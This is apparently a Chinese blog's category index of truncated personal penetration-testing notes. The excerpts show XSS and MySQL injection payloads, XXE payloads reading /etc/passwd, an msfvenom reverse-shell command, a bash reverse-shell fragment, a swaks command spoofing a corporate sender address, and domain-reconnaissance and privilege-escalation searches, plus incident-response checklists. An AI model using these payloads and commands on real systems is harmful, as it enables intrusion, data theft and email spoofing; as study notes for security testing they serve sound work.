随笔分类 -  个人笔记

摘要:<scirpt>alert("xss");</script> <img src=1 onerror=alert("xss");> <input onfocus="alert('xss');"> <input onblur=alert("xss") autofocus><input autofocus 阅读全文
posted @ 2022-01-19 23:40 bingtanghulu
摘要:1、查壳工具 链接: https://pan.baidu.com/s/1F4VdYAbAASTq2MZyGDu_CQ 提取码: ki37 2、安装frida pip3 install frida pip3 install frida-tools 安装FRIDA-DEXDump git clone h 阅读全文
posted @ 2021-12-12 19:39 bingtanghulu 阅读(1036) 评论(0) 推荐(0)
摘要:基础知识 安卓四大组件 Activity(界面):通常展现为一个可视化的用户界面,是负责与用户交互的组件。常见的漏洞包括Activity劫持漏洞、越权漏洞等。 Service(服务):无用户界面,是运行于后台的服务,但是及其重要,经常在后台执行一些敏感的操作。常见的漏洞包括权限提升,拒绝服务攻击等。 阅读全文
posted @ 2021-07-30 17:38 bingtanghulu 阅读(730) 评论(0) 推荐(0)
摘要:常用命令systeminfo 详细信息net start 启动服务tasklist 进程列表schtasks 计划任务ipconfig /all 判断域 dnsnet view /domain 判断存在域net time /domain 判断主域 获取域控名ping 域控名 或者 nslookup 阅读全文
posted @ 2021-07-14 16:34 bingtanghulu 阅读(411) 评论(0) 推荐(0)
摘要:CSRF(跨站请求伪造)是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。防御方法1.只使用json api2. 验证HTTP Referer字段3. 在请求地址中添 阅读全文
posted @ 2021-07-14 15:13 bingtanghulu 阅读(887) 评论(0) 推荐(1)
摘要:<script>alert('ha!');</script><svg/οnlοad=prompt(1)/><sCript>alert(1)</scRipt>%0a<script>alert(123)</script> <sCript>被屏蔽h' onerror='alert(123)2'oNmOuS 阅读全文
posted @ 2021-01-26 10:57 bingtanghulu 阅读(655) 评论(0) 推荐(0)
摘要:swaks --body "test" --header "Subject:test" -t 199@qq.com -f "chenyun@faw.com.cn" 去qq邮箱垃圾箱里面找,自动被屏蔽了 阅读全文
posted @ 2021-01-26 10:55 bingtanghulu 阅读(99) 评论(0) 推荐(0)
摘要:git clone --depth=1 --branch=master https://www.github.com/landgrey/pydictor.git cd pydictor/ chmod +x pydictor.py python pydictor.py 一、字典 1.生成6位纯数字字典 阅读全文
posted @ 2021-01-26 10:48 bingtanghulu 阅读(1129) 评论(0) 推荐(0)
摘要:用户类 主要包含用户的登录、密码找回、个人信息查阅等测试点 登录模块 用户名枚举 密码爆破 登录绕过 //篡改服务器返回包的状态码信息 登录凭证未及时失效 //登录成功后,服务器返回的用户凭证未及时失效或凭证时间过长,导致可重复利用进行登录。 登录越权 //篡改服务器返回包的用户 id 参数,来登录 阅读全文
posted @ 2020-09-03 11:03 bingtanghulu 阅读(435) 评论(0) 推荐(0)
摘要:tomcat--80/8080/8009 manager 弱口令 put上传webshell http慢速攻击 幽灵猫-文件包含 jboss 后台弱口令 控制台部署war包 JAVA反序列化 远程代码执行 webSphere--9080 后台弱口令 任意文件泄漏 JAVA反序列化 weblogic- 阅读全文
posted @ 2020-08-11 13:40 bingtanghulu 阅读(337) 评论(0) 推荐(0)
摘要:转载https://www.cnblogs.com/xishaonian/p/7721584.html msf 生成反弹 Windows Shell msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.62.129 lport=1234 阅读全文
posted @ 2020-07-27 15:06 bingtanghulu 阅读(352) 评论(0) 推荐(0)
摘要:转载学习于红日安全 一、有回显 (1)直接将外部实体引用的URI设置为敏感目录 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> (2)将外部实体引用的 U 阅读全文
posted @ 2020-07-27 10:02 bingtanghulu 阅读(2485) 评论(0) 推荐(0)
摘要:学习转载红日安全 1、robots.txt 2.网站备份压缩文件 文件可直接访问并下载。可能为.rar、zip、.7z、.tar.gz、.bak、.txt、.swp等等,以及和网站信息有关的文件名www.rar、web、rar等等 3.Git导致文件泄露 在运行gitinit初始化代码库的时候,会在 阅读全文
posted @ 2020-07-26 19:05 bingtanghulu 阅读(188) 评论(0) 推荐(0)
摘要:查看suid文件 find / -type f -perm -u=s 2>dev/null 查找可写文件 find / -writable -type f 2>/dev/null 反弹shell 这里没有nc命令直接用bash命令。(也可以直接上传反弹shell的php脚本) bash -i >& 阅读全文
posted @ 2020-07-15 17:38 bingtanghulu 阅读(259) 评论(0) 推荐(0)
摘要:https://mp.weixin.qq.com/s/RLdBCOUkcLpRoniacOP-Kw 1、Mysql 手工注入 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1 阅读全文
posted @ 2020-05-25 10:40 bingtanghulu 阅读(1180) 评论(0) 推荐(0)
摘要:windows应急响应 文件 C:\Documents and Settings\Administrator\Recent C:\Documents and Settings\Default User\Recent %UserProfile%\Recent 文件日期、新增文件、可疑/异常文件、最近使 阅读全文
posted @ 2020-05-14 16:03 bingtanghulu 阅读(121) 评论(0) 推荐(0)
摘要:转载于https://www.cnblogs.com/sn1per/p/12553064.html https://www.cnblogs.com/csnd/p/12332421.html 直接看上面大佬url就行了 笔记是给自己看的 数据链路层: 筛选mac地址为04:f9:38:ad:13:26 阅读全文
posted @ 2020-05-13 17:54 bingtanghulu 阅读(1116) 评论(0) 推荐(0)
摘要:linux应急响应 文件 ls -alt 查找72小时内新增的文件: find / -ctime -2 文件日期、新增文件、可疑/异常文件、最近使用文件、浏览器下载文件 /var/run/utmp 有关当前登录用户的信息记录 /etc/passwd 用户列表 /tmp 临时目录 ~/.ssh /et 阅读全文
posted @ 2020-05-13 11:12 bingtanghulu 阅读(154) 评论(0) 推荐(0)
摘要:Mysql 手工注入 1.联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_sch 阅读全文
posted @ 2020-05-08 17:14 bingtanghulu 阅读(418) 评论(0) 推荐(0)
摘要:1.<script>alert(1)</script> 2.源码第一个,[<]被转义,因此在第二个里 "><script>alert(1)</script><a class=" 3.源码对第一个,第二个对[<]做了转义,是单引 <input name=keyword value=' '>' onfo 阅读全文
posted @ 2020-05-07 18:06 bingtanghulu 阅读(1106) 评论(0) 推荐(0)